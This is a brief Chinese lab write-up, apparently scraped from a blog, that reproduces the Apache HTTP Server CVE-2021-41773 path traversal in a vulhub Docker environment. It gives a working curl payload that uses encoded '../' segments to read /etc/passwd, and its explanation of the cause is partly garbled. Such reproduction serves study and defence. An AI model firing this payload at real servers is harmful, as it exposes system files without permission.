漏洞复现-CVE-2021-41773

Posted 要热爱生活呀

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了漏洞复现-CVE-2021-41773相关的知识,希望对你有一定的参考价值。

漏洞原理

Apache在2.4.49版本中,引入路径体验,该漏洞仅影响具有“要求全部拒绝”访问权限的 Apache HTTP Server 2.4.49 版控制配置禁用。

漏洞危害

可利用漏洞进行远程RCE,访问web服务器上文档根目录之外的任意文件。泄露CGI。

影响版本

Apache HTTPd 2.4.49/2.4.50版本

环境搭建和测试

切换到vulhub/httpd/CVE-2021-41773,启动环境

docker-compose up -d

浏览器访问ip:8080

使用curl发送payload

curl -v --path-as-is http://127.0.0.1:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

批量

明天写

参考文献

shodan新手使用指南
批量

以上是关于漏洞复现-CVE-2021-41773的主要内容,如果未能解决你的问题,请参考以下文章

CVE-2021-41773|CVE-2021-42013——Apache HTTP Server路径遍历|远程代码执行

CVE-2021-41773/Apache HTTP Server 路径穿越漏洞

CVE-2021-41773/Apache HTTP Server 路径穿越漏洞

如何挖掘Apache2中的CVE-2021-41773漏洞

Apache——CVE-2021-41773

[GFCTF 2021]Baby_Web(复现)